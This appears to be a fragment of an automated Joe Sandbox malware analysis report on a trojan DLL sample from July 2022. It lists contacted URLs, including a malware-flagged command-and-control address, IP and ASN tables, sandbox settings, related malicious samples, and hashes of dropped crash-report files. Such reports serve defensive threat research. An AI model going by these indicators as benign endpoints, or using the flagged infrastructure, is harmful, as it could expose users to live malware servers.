                          https://174.138.33.49:7080/Numvregsvr32.exe, 0000000C.00000003.792402869.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.882736405.0000000000EB2000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001E.00000003.719101021.00000147607A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.718967987.00000147607B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.719233278.0000014760C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.718937080.00000147607B6000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://help.disneyplus.com.svchost.exe, 0000001E.00000003.714545443.00000147607A0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://support.hotspotshield.com/svchost.exe, 0000001E.00000003.710986823.0000014760C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710810502.0000014760C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710861874.0000014760C03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710944641.00000147607AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710923120.000001476079C000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://174.138.33.49/regsvr32.exe, 0000000C.00000003.792402869.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.882736405.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            32.7.0.0
                            unknownUnited States
                            2686ATGS-MMD-ASUStrue
                            174.138.33.49
                            unknownUnited States
                            14061DIGITALOCEAN-ASNUStrue
                            128.7.0.0
                            unknownGermany
                            680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue
                            20.7.0.0
                            unknownUnited States
                            8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                            108.7.0.0
                            unknownUnited States
                            701UUNETUStrue
                            80.7.0.0
                            unknownUnited Kingdom
                            5089NTLGBtrue
                            92.7.0.0
                            unknownUnited Kingdom
                            13285OPALTELECOM-ASTalkTalkCommunicationsLimitedGBtrue
                            244.6.0.0
                            unknownReserved
                            unknownunknowntrue
                            240.69.242.0
                            unknownReserved
                            unknownunknowntrue
                            184.6.0.0
                            unknownUnited States
                            209CENTURYLINK-US-LEGACY-QWESTUStrue
                            192.6.0.0
                            unknownUnited States
                            54735TTGSIUStrue
                            112.7.0.0
                            unknownChina
                            24444CMNET-V4SHANDONG-AS-APShandongMobileCommunicationCompanytrue
                            64.6.0.0
                            unknownUnited States
                            14363MTCCOMMUStrue
                            214.112.3.0
                            unknownUnited States
                            721DNIC-ASBLK-00721-00726UStrue
                            4.7.0.0
                            unknownUnited States
                            3356LEVEL3UStrue
                            76.7.0.0
                            unknownUnited States
                            22186CENTURYLINK-LEGACY-EMBARQ-KSGRNRUStrue
                            96.7.0.0
                            unknownUnited States
                            262589INTERNEXABRASILOPERADORADETELECOMUNICACOESSABRtrue
                            240.6.0.0
                            unknownReserved
                            unknownunknowntrue
                            243.112.3.0
                            unknownReserved
                            unknownunknowntrue
                            200.6.0.0
                            unknownEcuador
                            8151UninetSAdeCVMXtrue
                            241.112.3.0
                            unknownReserved
                            unknownunknowntrue
                            124.7.0.0
                            unknownIndia
                            4662QTCN-ASN1GCNetReachRangeIncTWtrue
                            16.7.0.0
                            unknownUnited States
                            unknownunknowntrue
                            36.7.0.0
                            unknownChina
                            4134CHINANET-BACKBONENo31Jin-rongStreetCNtrue
                            244.26.0.0
                            unknownReserved
                            unknownunknowntrue
                            IP
                            192.168.2.1
                            192.168.2.7
                            127.0.0.1
                            Joe Sandbox Version:35.0.0 Citrine
                            Analysis ID:671702
                            Start date and time: 22/07/202213:55:582022-07-22 13:55:58 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 11m 26s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:MIpuuSiSZ4 (renamed file extension from none to dll)
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:32
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal96.troj.evad.winDLL@34/16@0/28
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 86.9% (good quality ratio 81.6%)
                            • Quality average: 75%
                            • Quality standard deviation: 30.3%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 21
                            • Number of non-executed functions: 300
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Override analysis time to 240s for rundll32
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 23.211.6.115, 209.197.3.8, 20.189.173.22, 20.189.173.21, 23.35.236.56, 20.223.24.244
                            • Excluded domains from analysis (whitelisted): onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, login.live.com, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            13:58:18API Interceptor2x Sleep call for process: WerFault.exe modified
                            13:58:51API Interceptor10x Sleep call for process: svchost.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            174.138.33.49Bericht 6581.xlsGet hashmaliciousBrowse
                              PYCkUgesWB.dllGet hashmaliciousBrowse
                                2BQPIiVlqe.dllGet hashmaliciousBrowse
                                  nz032vqLOi.dllGet hashmaliciousBrowse
                                    nz032vqLOi.dllGet hashmaliciousBrowse
                                      azKC4bycQq.dllGet hashmaliciousBrowse
                                        azKC4bycQq.dllGet hashmaliciousBrowse
                                          bLJR1tSMfo.dllGet hashmaliciousBrowse
                                            bLJR1tSMfo.dllGet hashmaliciousBrowse
                                              HUrHMu39FU.dllGet hashmaliciousBrowse
                                                HUrHMu39FU.dllGet hashmaliciousBrowse
                                                  5Fa665mRHe.dllGet hashmaliciousBrowse
                                                    5Fa665mRHe.dllGet hashmaliciousBrowse
                                                      8QfaZFMbEb.dllGet hashmaliciousBrowse
                                                        P22l0y2mfd.dllGet hashmaliciousBrowse
                                                          ik1z1nXXuU.dllGet hashmaliciousBrowse
                                                            xWvN5HkNDU.dllGet hashmaliciousBrowse
                                                              bOc8U9QEOx.dllGet hashmaliciousBrowse
                                                                8QfaZFMbEb.dllGet hashmaliciousBrowse
                                                                  P22l0y2mfd.dllGet hashmaliciousBrowse
                                                                    No context
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    ATGS-MMD-ASUSUAwAYtkv6TGet hashmaliciousBrowse
                                                                    • 57.10.146.236
                                                                    1C1n23or44Get hashmaliciousBrowse
                                                                    • 48.61.236.220
                                                                    6xxXpNpWyqGet hashmaliciousBrowse
                                                                    • 48.171.85.246
                                                                    wyNZjuUDrHGet hashmaliciousBrowse
                                                                    • 32.200.166.219
                                                                    QXl6ByOnZ0Get hashmaliciousBrowse
                                                                    • 57.203.208.147
                                                                    U3qoYxBsNEGet hashmaliciousBrowse
                                                                    • 57.30.29.165
                                                                    home.mipsGet hashmaliciousBrowse
                                                                    • 48.145.66.51
                                                                    SecuriteInfo.com.W32.AIDetectNet.01.21175.exeGet hashmaliciousBrowse
                                                                    • 34.149.198.43
                                                                    1FYzIEIGo9Get hashmaliciousBrowse
                                                                    • 34.28.143.183
                                                                    ExzuUFbeh6Get hashmaliciousBrowse
                                                                    • 57.235.118.223
                                                                    pcRNUo14T6Get hashmaliciousBrowse
                                                                    • 48.150.133.225
                                                                    FvEkW50244Get hashmaliciousBrowse
                                                                    • 57.203.73.217
                                                                    6I5XtNRL9GGet hashmaliciousBrowse
                                                                    • 57.205.36.22
                                                                    B5paMVgw8TGet hashmaliciousBrowse
                                                                    • 34.190.213.169
                                                                    https://www.goodnewsnetwork.org/renaissance-masterpiece-london-bedroom-dawsons/Get hashmaliciousBrowse
                                                                    • 34.149.20.76
                                                                    VxYrEUScE3Get hashmaliciousBrowse
                                                                    • 48.63.210.92
                                                                    yakuza.x86Get hashmaliciousBrowse
                                                                    • 51.206.208.103
                                                                    DdgfY9BT6l.dllGet hashmaliciousBrowse
                                                                    • 56.159.237.91
                                                                    mAgMRXeHnV.dllGet hashmaliciousBrowse
                                                                    • 33.96.163.37
                                                                    giXSx7co4Z.dllGet hashmaliciousBrowse
                                                                    • 34.62.52.224
                                                                    No context
                                                                    No context
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9bd413be, page size 16384, DirtyShutdown, Windows version 10.0
                                                                    Category:dropped
                                                                    Size (bytes):786432
                                                                    Entropy (8bit):0.2507301596835623
                                                                    Encrypted:false
                                                                    SSDEEP:384:s+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:zSB2nSB2RSjlK/+mLesOj1J2
                                                                    MD5:67BC1180577BCAE7AAAB0395C6668DE1
                                                                    SHA1:54063A0EBB7A899A61F7B47C28B184EA080C9FEB
                                                                    SHA-256:AADEEC33723E9CB7C975F69645141F65B1CF0545EB6FD12269210108B22083D8
                                                                    SHA-512:6AF6B62F9A980A09C1C2CF4A5C7297B156B960DAF9280D7F981356EA56096AA9B765F60FB2FA5D8641B3513A03F4C4736DAF0B9D3F0F368E0F212CC2136240A8
                                                                    Malicious:false
                                                                    Preview:....... ................e.f.3...w........................&..........w..3:...z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................~...4:...z'................... 4:...z'.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.7745360116180453
                                                                    Encrypted:false
                                                                    SSDEEP:192:U5vigJKVHkhyJdJsjIU/u7sVS274ltNw:uviuKFkEJdJsjj/u7sVX4ltNw
                                                                    MD5:DC08AF70F1A9F069487A3081FFAE724A
                                                                    SHA1:EE7D71A22BEDE02D198F895950703D4BBF73F5F0
                                                                    SHA-256:0D736C5C970F822A0FBB017CA75F4894BAF5E23525FAC93D52720D575D247A4C
                                                                    SHA-512:3475021FFDAAD7B6D5AB9ACEE4E5B84B5091AAB192565EB29BAD694D46083E132F31B3B2D157E4346942580D4224FC3FE4743B998935740FFD724E7CDACE20F7
                                                                    Malicious:false
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.2.9.9.7.0.8.6.8.5.0.3.1.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.2.9.9.7.0.9.7.4.4.3.9.5.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.a.2.3.b.0.8.-.5.7.9.2.-.4.d.9.b.-.8.d.e.9.-.f.0.c.9.f.e.9.2.8.a.9.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.f.e.3.b.9.1.-.d.9.1.4.-.4.7.d.9.-.a.8.c.7.-.7.7.4.6.f.5.f.d.b.9.d.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.M.I.p.u.u.S.i.S.Z.4...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.3.8.-.0.0.0.1.-.0.0.1.8.-.1.5.a.5.-.5.6.9.e.0.d.9.e.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.f.3.4.c.c.f.d.d.8.1.4.1.a.e.e.e.2.e.8.9.f.f.b.0.7.0.c.e.2.3.9.c.7.d.0.0.7.
                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.7735005926866978
                                                                    Encrypted:false
                                                                    SSDEEP:96:aRFnliyQijJPny2jT55I73f2pXIQcQqc620ycEBcw3pXaXz+HbHgSQgJPbwGIDVU:KfixijJKSHkhyLtjIU/u7sVS274ltN
                                                                    MD5:A86B7FADCDE51D62CE966354FB5F6D3E
                                                                    SHA1:3CDC004C4F0E8C87DEDE02051BD08E5733D5A620
                                                                    SHA-256:62D635E063040B7F760E0424452183FB2DBA728192E3559036CECF5DB0A4B868
                                                                    SHA-512:686DCADB722410A0A0AC4884411C4742CADB7CE3A81E9B5C38F2C63480FEBCE141912E5E577C73DF0B6D13DF7E6E346CEF1E8F44FD7708E28AE28F3C19EEA75F
                                                                    Malicious:false
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.2.9.9.7.0.8.3.8.3.0.0.4.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.2.9.9.7.0.9.6.3.7.6.7.9.4.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.4.5.6.d.6.a.-.4.a.0.3.-.4.1.1.2.-.b.6.0.2.-.7.6.1.0.4.9.f.7.9.0.2.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.0.b.7.e.3.e.8.-.e.b.a.b.-.4.1.8.e.-.8.7.f.f.-.b.e.7.a.0.0.9.2.5.9.8.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.M.I.p.u.u.S.i.S.Z.4...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.1.0.-.0.0.0.1.-.0.0.1.8.-.8.8.1.e.-.1.0.9.e.0.d.9.e.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.f.3.4.c.c.f.d.d.8.1.4.1.a.e.e.e.2.e.8.9.f.f.b.0.7.0.c.e.2.3.9.c.7.d.0.0.7.
                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 15 streams, Fri Jul 22 20:58:11 2022, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):63490
                                                                    Entropy (8bit):2.3463206366673157
                                                                    Encrypted:false
                                                                    SSDEEP:384:DIyacvV4z7BXVjaKChYAFwvpMlwdbA5AQ:fact4x1COGqbV
                                                                    MD5:6DA5CE983BAF9352E00714A8BB39727E
                                                                    SHA1:40AC6315F73498356FFD4546AB837B1EDB8E4436
                                                                    SHA-256:E1FDAEE089B49ED19476BC82FEADFAC287A65FD3F7FE361C64BEA1CA72FF9F49
                                                                    SHA-512:8B22B9B1C1F8DE25E6B994F2143D6D08F4DC8C2285CCADD2968A612209FC7C69CD9849FBD9D6FA9A7BDD322E16B9203585199853F6824CA1C5D4A589572651E1
                                                                    Malicious:false
                                                                    Preview:MDMP....... .......c..b....................................h...8.......D...8:..........`.......8...........T...............Z............!...........#...................................................................U...........B......$$......Lw.....................T...........)..b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 15 streams, Fri Jul 22 20:58:12 2022, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):64526
                                                                    Entropy (8bit):2.3013812479784215
                                                                    Encrypted:false
                                                                    SSDEEP:192:0VlvLya1EV4zKQBXVjLSp/JwKOC5CZ5HtitAzdQG0wdS3oCwcPxAX/WjwGvnMrsQ:gyaSV4z7BXVjaeCsTNglwdI4CwG0oH
                                                                    MD5:EA3866323B1704449AD420AFF2568E70
                                                                    SHA1:A8D86FB576FDACCE09830A84D42D6BEF00BEE8A6
                                                                    SHA-256:A076EBFBE6DE8900FA059902F628D87B656F7CA5652162CEFB772D406A486FB2
                                                                    SHA-512:A656792FD06E4857B793F3473899619DEEA32D8E33F2706EE12D7D7661618DBDB13558F1908D79D48E38834149EFD3B7608D4CFF570BF3DA0D7CC2AE54677749
                                                                    Malicious:false
                                                                    Preview:MDMP....... .......d..b....................................h...8.......T...8:..........`.......8...........T...........X................!...........#...................................................................U...........B......$$......Lw................$\a...T.......8...)..b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8756
                                                                    Entropy (8bit):3.699929917648694
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNiUdXVS236Yn8Orgmf1RS/9XCprk89bLHexfCl5m:RrlsNiuXVSG6Y8Orgmf1RSVmLHgfCy
                                                                    MD5:5707F8FB038E671C7B62CB5035AAAB02
                                                                    SHA1:74C594EF9DA77B7F4D233D5F7F6C1961A4D7A113
                                                                    SHA-256:7E3AA329FF2FDBF29AFBBAC46A16C4268399B33CF15B4D0105AC15CCD4ADB59E
                                                                    SHA-512:882B94720EE909570C32FAC048E9AEF2EC5D5F6374061B7CEAF8B57740ADB0611D89424E18CDEAE72D2ED828B82F6E00EE20085174520DDD56E7BA9EA396D235
                                                                    Malicious:false
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.6.0.<./.P.i.d.>.......
                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4733
                                                                    Entropy (8bit):4.4845182631342055
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zsqJgtBI9oeWgc8sqYjX8fm8M4JC/WC/J8FHPyq85m/E8pkZESC5S0d:uITf4qfgrsqYIJ8baP9FmVv0d
                                                                    MD5:1ADF8A480754A46C16ABB3071BBDE030
                                                                    SHA1:4296C5D7A325C8AA4A1EE0E4D31C842A9B7A7F51
                                                                    SHA-256:FF255A547C95F1D3E34B22ABD7F4E29D2F61796538E64A29E0C19F082BAAEC36
                                                                    SHA-512:1EA031B7241D3D88449510EB32C833A9EE93CFFF6B4F91D14A38D9977D2243F78126688445C124252333F9F172BB02A1D857D5F367641E92C98E5C9A8D208D67
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1614608" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):53366
                                                                    Entropy (8bit):3.039602557285005
                                                                    Encrypted:false
                                                                    SSDEEP:1536:7pHolfWew9msUxoufVGpupKCxx8a4JIR1efcW6qbwYsbTRVK:7pHolfWew9msUxoufVGpupKax8a4JIRM
                                                                    MD5:AD9B2D87A8B0A0650C811F0196D3FC69
                                                                    SHA1:E589D91FD2A256451BDD824C34DC087AA4C18F99
                                                                    SHA-256:8D499200DC2DC20F84F58BC3CB5E051FA9854AFA7A889D84EED09EE5F81E49A5
                                                                    SHA-512:FFFD113868323A53C6453B1A351B18CA23079C23C0E839E96EB776983F70B86184A21413DE003E518D8133820935F665E6A9F9BD64A3B719D15055D6E7CE766B
                                                                    Malicious:false
                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8780
                                                                    Entropy (8bit):3.7024676918374104
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNi5M4SC6YZiD/dgmf15S/3J0XCprpx89b90qf+7fm:RrlsNiC4SC6Y8D/dgmf15SvJ0P9pf+K
                                                                    MD5:351B391DF4BC5442150F6F2B00D5BD60
                                                                    SHA1:79BD5E9F2C1D8B703125E7E0DBC2F0451C6E048E
                                                                    SHA-256:A3451CB058B5E7CD354B15B5414F4845CD0C6E54A6A823D4BE11F550011DEB0D
                                                                    SHA-512:8074FDBA7BBBDFDB2945D905D8E20222A7DEFB83EB731847D8F152892F92E505CD144413115FA7208F08924309D7AEBB268BFFB4665FD24B1B75CB8C7903DC74
                                                                    Malicious:false
